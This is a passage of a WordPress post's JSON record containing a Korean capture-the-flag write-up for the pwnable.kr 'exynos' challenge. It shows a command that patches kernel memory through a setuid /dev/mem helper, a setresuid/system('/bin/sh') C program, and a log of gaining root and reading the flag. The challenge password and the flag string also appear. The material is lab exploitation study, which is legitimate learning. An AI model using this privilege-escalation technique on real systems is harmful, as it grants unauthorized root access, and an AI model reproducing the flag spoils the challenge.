\ubd84\uae30\ubb38\uacfc \uc0c1\uad00\uc5c6\uc774 \ud56d\uc0c1 1\uc774 \ubc18\ud658\ub418\ub3c4\ub85d \ud328\uce58\ud55c\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-1024x706.png\" alt=\"\" class=\"wp-image-3292\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-1024x706.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-300x207.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11-768x529.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-11.png 1204w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><code>0x600278EC<\/code> \uc8fc\uc18c\uc5d0 \uc788\ub294 opcode\ub97c <code>MOV R0, #1<\/code>\uc73c\ub85c \ud328\uce58\ud574\uc8fc\uba74 \ub41c\ub2e4. <br>(<code>MOV R0, #1<\/code> \u2192 <code>\\x01\\x00\\xA0\\xE3<\/code>)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"228\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-1024x228.png\" alt=\"\" class=\"wp-image-3293\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-1024x228.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-300x67.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-768x171.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12-1536x342.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-12.png 1754w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\uc2e4\ud589\uc2dc\ud0a4\uba74 \ud328\uce58\ub41c\ub2e4.<\/p>\n\n\n\n<p><code>0x600278EC = 1610774764<\/code><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo -e \"\\x01\\x00\\xA0\\xE3\" | \/exynos-mem 1610774764 4 1<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sh: can't access tty; job control turned off\n\/ $ cd \/tmp\n\/tmp $ vi shell.c\n\/tmp $ cat shell.c\n#include &lt;unistd.h>\n\nint main(){\n    setresuid(0,0,0);\n    system(\"\/bin\/sh\");\n    return 0;\n}\n\/tmp $ gcc -o shell shell.c\n\/tmp $ echo -e \"\\x01\\x00\\xA0\\xE3\" | \/exynos-mem 1610774764 4 1\nprocessed 4 bytes\n\/tmp $ .\/shell\n\/bin\/sh: can't access tty; job control turned off\n\/tmp # id\nuid=0 gid=1000 groups=1000\n\/tmp # cd \/root\n\/root # ls\nflag\n\/root # cat flag\nr3ad_Writ3_kernel_m3mory_as_1_want\n\/root # <\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description (pw: Must_san1tize_Us3r_p0int3r) Analysis \ud30c\uc77c\uc744 \ud655\uc778\ud574\ubcf4\uba74, exynos-mem \uc2e4\ud589 \ud30c\uc77c\uc774 \ubcf4\uc778\ub2e4. \uc2e4\ud589\uad8c\ud55c\uc774 4775\ub85c \ub418\uc5b4\uc788\uae30 \ub54c\ubb38\uc5d0 setuid \ube44\ud2b8\uac00 \ud65c\uc131\ud654\ub418\uc5b4\uc788\ub2e4. \ub530\ub77c\uc11c \uc2e4\ud589\uc2dc\ud0a4\uba74 \uc77c\ubc18 \uc0ac\uc6a9\uc790\ub354\ub77c\ub3c4 root \uad8c\ud55c\uc73c\ub85c \uc2e4\ud589\ub41c\ub2e4. Decompiled src \/dev\/mem \ub294 \ubb3c\ub9ac \uba54\ubaa8\ub9ac\uc758 \ubaa8\ub4e0 \uc601\uc5ed\uc5d0 \uc0ac\uc6a9\uc790 \uacf5\uac04\uc5d0\uc11c \uc9c1\uc811 \uc811\uadfc\ud560 \uc218 \uc788\ub294 \uc7a5\uce58 \ud30c\uc77c\uc774\ub2e4. \uc778\uc790\ub294 \ub2e4\uc74c\uacfc \uac19\uc774 \ud30c\uc2f1\ub41c\ub2e4. \uc774\ub97c \ud14c\uba74 \ub2e4\uc74c\uacfc \uac19\uc774 \uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4. \uc608\uc2dc: Solution \uc774\uc804\uc5d0 \uc5d1\uc2dc\ub178\uc2a4\uce69\uc774&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3285\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">exynos<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3285","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3285"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3285\/revisions"}],"predecessor-version":[{"id":3294,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3285\/revisions\/3294"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}